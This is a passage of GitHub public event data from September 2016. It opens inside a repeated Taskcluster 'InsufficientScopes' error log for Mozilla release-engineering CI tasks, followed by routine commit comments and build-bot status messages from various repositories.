\\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"rok@garbas.si\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T11:58:10.069Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T11:58:10.069Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"DVuyshYdRHOYQ83mq8-uZQ\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T11:58:10.069Z\\\"\\n}\\n  time:     2016-09-23T11:58:10.276Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:branch:master\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:branch:master\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"Pch2ix3rTXGCzfGQm37UTw\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"releng_docs\\\",\\n    \\\"description\\\": \\\"Test, build and deploy releng_docs\\\",\\n    \\\"owner\\\": \\\"rok@garbas.si\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/releng_docs\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"releng_docs\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"17a42239c28547f5645a774e3d70fa5c58811783\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"garbas\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"rok@garbas.si\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T11:58:10.069Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T11:58:10.069Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"DVuyshYdRHOYQ83mq8-uZQ\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T11:58:10.069Z\\\"\\n}\\n  time:     2016-09-23T11:58:10.276Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:branch:master\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"Pch2ix3rTXGCzfGQm37UTw\"\n                },\n                \"payload\": {\n                    \"metadata\": {\n                        \"name\": \"releng_docs\",\n                        \"description\": \"Test, build and deploy releng_docs\",\n                        \"owner\": \"rok@garbas.si\",\n                        \"source\": \"https://github.com/mozilla-releng/services/tree/master/src/releng_docs\"\n                    },\n                    \"scopes\": [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.*\",\n                                \"push\"\n                            ],\n                            \"branches\": [\n                                \"master\"\n                            ]\n                        }\n                    },\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"payload\": {\n                        \"maxRunTime\": 7200,\n                        \"image\": \"nixos/nix:latest\",\n                        \"features\": {\n                            \"taskclusterProxy\": true\n                        },\n                        \"env\": {\n                            \"APP\": \"releng_docs\",\n                            \"TASKCLUSTER_SECRETS\": \"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\",\n                            \"GITHUB_EVENT\": \"push\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_BASE_SHA\": \"17a42239c28547f5645a774e3d70fa5c58811783\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/mozilla-releng/services.git\",\n                            \"GITHUB_HEAD_USER\": \"garbas\",\n                            \"GITHUB_HEAD_SHA\": \"c70e3321a3d31f95036588c14dfafc3a0ea581f3\",\n                            \"GITHUB_HEAD_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"rok@garbas.si\"\n                        },\n                        \"command\": [\n                            \"/bin/bash\",\n                            \"-c\",\n                            \"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\"\n                        ]\n                    },\n                    \"created\": \"2016-09-23T11:58:10.069Z\",\n                    \"deadline\": \"2016-09-24T11:58:10.069Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"DVuyshYdRHOYQ83mq8-uZQ\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"routes\": [],\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"tags\": {},\n                    \"expires\": \"2017-09-24T11:58:10.069Z\"\n                },\n                \"time\": \"2016-09-23T11:58:10.276Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-releng/services:branch:master\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:route:index.garbage.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    },\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:branch:master\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"U7Zya302RxqwqTMPapYsFQ\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"releng_frontend\\\",\\n    \\\"description\\\": \\\"Test, build and deploy releng_frontend\\\",\\n    \\\"owner\\\": \\\"rok@garbas.si\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/releng_frontend\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"releng_frontend\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"17a42239c28547f5645a774e3d70fa5c58811783\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"garbas\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"rok@garbas.si\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T11:58:10.070Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T11:58:10.070Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"DVuyshYdRHOYQ83mq8-uZQ\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T11:58:10.070Z\\\"\\n}\\n  time:     2016-09-23T11:58:10.296Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:branch:master\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:branch:master\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"U7Zya302RxqwqTMPapYsFQ\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"releng_frontend\\\",\\n    \\\"description\\\": \\\"Test, build and deploy releng_frontend\\\",\\n    \\\"owner\\\": \\\"rok@garbas.si\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/releng_frontend\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"releng_frontend\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"17a42239c28547f5645a774e3d70fa5c58811783\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"garbas\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"rok@garbas.si\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T11:58:10.070Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T11:58:10.070Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"DVuyshYdRHOYQ83mq8-uZQ\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T11:58:10.070Z\\\"\\n}\\n  time:     2016-09-23T11:58:10.296Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:branch:master\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"U7Zya302RxqwqTMPapYsFQ\"\n                },\n                \"payload\": {\n                    \"metadata\": {\n                        \"name\": \"releng_frontend\",\n                        \"description\": \"Test, build and deploy releng_frontend\",\n                        \"owner\": \"rok@garbas.si\",\n                        \"source\": \"https://github.com/mozilla-releng/services/tree/master/src/releng_frontend\"\n                    },\n                    \"scopes\": [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.*\",\n                                \"push\"\n                            ],\n                            \"branches\": [\n                                \"master\"\n                            ]\n                        }\n                    },\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"payload\": {\n                        \"maxRunTime\": 7200,\n                        \"image\": \"nixos/nix:latest\",\n                        \"features\": {\n                            \"taskclusterProxy\": true\n                        },\n                        \"env\": {\n                            \"APP\": \"releng_frontend\",\n                            \"TASKCLUSTER_SECRETS\": \"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\",\n                            \"GITHUB_EVENT\": \"push\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_BASE_SHA\": \"17a42239c28547f5645a774e3d70fa5c58811783\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/mozilla-releng/services.git\",\n                            \"GITHUB_HEAD_USER\": \"garbas\",\n                            \"GITHUB_HEAD_SHA\": \"c70e3321a3d31f95036588c14dfafc3a0ea581f3\",\n                            \"GITHUB_HEAD_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"rok@garbas.si\"\n                        },\n                        \"command\": [\n                            \"/bin/bash\",\n                            \"-c\",\n                            \"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\"\n                        ]\n                    },\n                    \"created\": \"2016-09-23T11:58:10.070Z\",\n                    \"deadline\": \"2016-09-24T11:58:10.070Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"DVuyshYdRHOYQ83mq8-uZQ\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"routes\": [],\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"tags\": {},\n                    \"expires\": \"2017-09-24T11:58:10.070Z\"\n                },\n                \"time\": \"2016-09-23T11:58:10.296Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-releng/services:branch:master\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:route:index.garbage.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    }\n]\n```"}},"created_at":"2016-09-23T11:58:10Z"}
{"id":"4608136099","type":"CommitCommentEvent","actor":{"login":"cstefanache"},"repo":{"name":"cstefanache/angular2-img-cropper"},"payload":{"comment":{"id":19145122,"position":null,"line":null,"path":null,"commit_id":"d9d33299b90c74c55d051eecfe52ef8d240c0c82","created_at":"2016-09-23T11:58:25Z","updated_at":"2016-09-23T11:58:25Z","body":"Just merged the pull request. I am going to travel for 2 more weeks and I don't have the possibility to test the code. Trusting you on this one -> Just let me know if you need a release and I will try to find time to perform a new one."}},"created_at":"2016-09-23T11:58:25Z"}
{"id":"4608136978","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19145126,"position":null,"line":null,"path":null,"commit_id":"fc059d543d9a6d359c33d4eb5b3cbdf5ca7c5438","created_at":"2016-09-23T11:58:39Z","updated_at":"2016-09-23T11:58:39Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/35969/testReport/) for this commit**"}},"created_at":"2016-09-23T11:58:39Z"}
{"id":"4608138475","type":"CommitCommentEvent","actor":{"login":"FleetAdmiral"},"repo":{"name":"felicity-buzz-2k16/buzz2k16-main-website"},"payload":{"comment":{"id":19145133,"position":null,"line":null,"path":null,"commit_id":"032a9b8b5ecf07939b9f80844ecb08abb0f0e74c","created_at":"2016-09-23T11:59:03Z","updated_at":"2016-09-23T11:59:03Z","body":"Had done this in another directory, uploaded the wrong one, sorry :/"}},"created_at":"2016-09-23T11:59:03Z"}
{"id":"4608139829","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19145137,"position":null,"line":null,"path":null,"commit_id":"108d70b64ee909457f2468b44a3acc9300672436","created_at":"2016-09-23T11:59:22Z","updated_at":"2016-09-23T11:59:22Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/35970/testReport/) for this commit**"}},"created_at":"2016-09-23T11:59:22Z"}
{"id":"4608140970","type":"CommitCommentEvent","actor":{"login":"vpeter4"},"repo":{"name":"LibreELEC/LibreELEC.tv"},"payload":{"comment":{"id":19145140,"position":null,"line":null,"path":null,"commit_id":"07147c0e24c205b1ff96d72b45148b23ebbc2e60","created_at":"2016-09-23T11:59:39Z","updated_at":"2016-09-23T11:59:39Z","body":"Moved to http://sources.libreelec.tv/mirror/kodi/kodi-17.0-beta2-6e9d6fb.tar.xz"}},"created_at":"2016-09-23T11:59:39Z"}
{"id":"4608141497","type":"CommitCommentEvent","actor":{"login":"los16dura"},"repo":{"name":"los16dura/robot-tasks"},"payload":{"comment":{"id":19145142,"position":null,"line":null,"path":null,"commit_id":"441fb2b2425bc644547d834b840d15c6dfdbf0b7","created_at":"2016-09-23T11:59:46Z","updated_at":"2016-09-23T11:59:46Z","body":"18"}},"created_at":"2016-09-23T11:59:46Z"}
{"id":"4608142618","type":"CommitCommentEvent","actor":{"login":"estellecomment"},"repo":{"name":"medic/medic-gateway"},"payload":{"comment":{"id":19145145,"position":51,"line":51,"path":"src/main/java/medic/gateway/alert/GatewayEventLogFragment.java","commit_id":"3490e32183c6502c560ee4b3033fb7da7c0cd0aa","created_at":"2016-09-23T12:00:02Z","updated_at":"2016-09-23T12:00:02Z","body":"honestly I think that's worse... If you can abbreviate then it means you probably don't need the abbreviated part!"}},"created_at":"2016-09-23T12:00:02Z"}
{"id":"4608144211","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19145149,"position":null,"line":null,"path":null,"commit_id":"7a78e4a6a1e6898b3d2e5b65817da156887755a3","created_at":"2016-09-23T12:00:21Z","updated_at":"2016-09-23T12:00:21Z","body":"TeamCity OTA+ :: rvi_sota_server :: migrations container [Build 62](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14106&buildTypeId=ota_plus_RviSotaServer_MigrationsContainer) is now running\n"}},"created_at":"2016-09-23T12:00:21Z"}
{"id":"4608146027","type":"CommitCommentEvent","actor":{"login":"dawnsmell"},"repo":{"name":"dawnsmell/ReviewTest"},"payload":{"comment":{"id":19145152,"position":25,"line":186,"path":"UnitHomming.cs","commit_id":"098fc6bd862159645dab62a5ff57259f3dc1dc40","created_at":"2016-09-23T12:00:48Z","updated_at":"2016-09-23T12:00:48Z","body":"아우~ 좋네요~"}},"created_at":"2016-09-23T12:00:48Z"}
{"id":"4608147484","type":"CommitCommentEvent","actor":{"login":"dawnsmell"},"repo":{"name":"dawnsmell/ReviewTest"},"payload":{"comment":{"id":19145156,"position":25,"line":186,"path":"UnitHomming.cs","commit_id":"098fc6bd862159645dab62a5ff57259f3dc1dc40","created_at":"2016-09-23T12:01:10Z","updated_at":"2016-09-23T12:01:10Z","body":"감사합니다~"}},"created_at":"2016-09-23T12:01:10Z"}
{"id":"4608150071","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19145162,"position":null,"line":null,"path":null,"commit_id":"7a78e4a6a1e6898b3d2e5b65817da156887755a3","created_at":"2016-09-23T12:01:49Z","updated_at":"2016-09-23T12:01:49Z","body":"TeamCity OTA+ :: rvi_sota_server :: migrations container [Build 62](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14106&buildTypeId=ota_plus_RviSotaServer_MigrationsContainer) outcome was **SUCCESS**\nSummary: Running Build time: 00:01:28"}},"created_at":"2016-09-23T12:01:49Z"}
{"id":"4608151209","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19145164,"position":null,"line":null,"path":null,"commit_id":"7c4e7cb6c1f4fe075d37b318bcf582d17811da84","created_at":"2016-09-23T12:02:07Z","updated_at":"2016-09-23T12:02:07Z","body":"develop (macumber) - i386-Windows-7-VisualStudio-12: Tests Failed (2169 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7c4e7cb6c1f4fe075d37b318bcf582d17811da84-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7c4e7cb6c1f4fe075d37b318bcf582d17811da84-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-88.6%25-red.svg)</a> \n"}},"created_at":"2016-09-23T12:02:07Z"}
{"id":"4608152542","type":"CommitCommentEvent","actor":{"login":"vdemeester"},"repo":{"name":"containous/traefik"},"payload":{"comment":{"id":19145167,"position":null,"line":null,"path":null,"commit_id":"9f6484a328127189009d83dd2758115ccc4529c1","created_at":"2016-09-23T12:02:22Z","updated_at":"2016-09-23T12:02:22Z","body":"@cameronattard should be in `1.1` so pretty soon :angel: "}},"created_at":"2016-09-23T12:02:22Z"}
